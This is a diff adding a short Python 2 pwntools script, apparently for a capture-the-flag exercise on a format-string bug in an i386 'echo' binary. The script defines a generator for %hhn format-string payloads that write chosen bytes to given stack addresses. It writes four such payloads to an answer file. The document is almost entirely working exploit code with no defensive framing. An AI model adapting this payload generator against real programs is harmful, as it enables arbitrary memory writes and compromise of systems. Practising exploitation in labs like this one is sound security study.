Renamed

FormatString/echo/test_echo.py

@@ -0,0 +1,35 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+def gen_write_byte_format_string_i386(byte_value, write_address, fmtstr_shift_position, padding='0'):
+    # Placing: Align4(Padding Characters(Output_Count = byte_value), Fmtstr), Write Address
+    first_padding = padding * byte_value
+    flag = True
+    align_part_align_length = int(math.ceil(float(byte_value) / 4) + 2)
+    fmt_str = "%%%d$hhn" % (fmtstr_shift_position + align_part_align_length)
+    result_1 = first_padding + fmt_str
+    result_1 += (align_part_align_length * 4 - len(result_1)) * padding
+    result = result_1 + p32(write_address)
+    return result
+
+with open("answer_echo.txt", "w") as f:
+    f.write(gen_write_byte_format_string_i386(1, 0xffffce0c, 7))
+    f.write("\n")
+    f.write(gen_write_byte_format_string_i386(2, 0xffffce0d, 7))
+    f.write("\n")
+    f.write(gen_write_byte_format_string_i386(3, 0xffffce0e, 7))
+    f.write("\n")
+    f.write(gen_write_byte_format_string_i386(4, 0xffffce0f, 7))
+    f.write("\n")
+    f.write("exit")
+    f.write("\n")
+
+
+#p = process('./echo')
+#elf = ELF('./echo')
+
+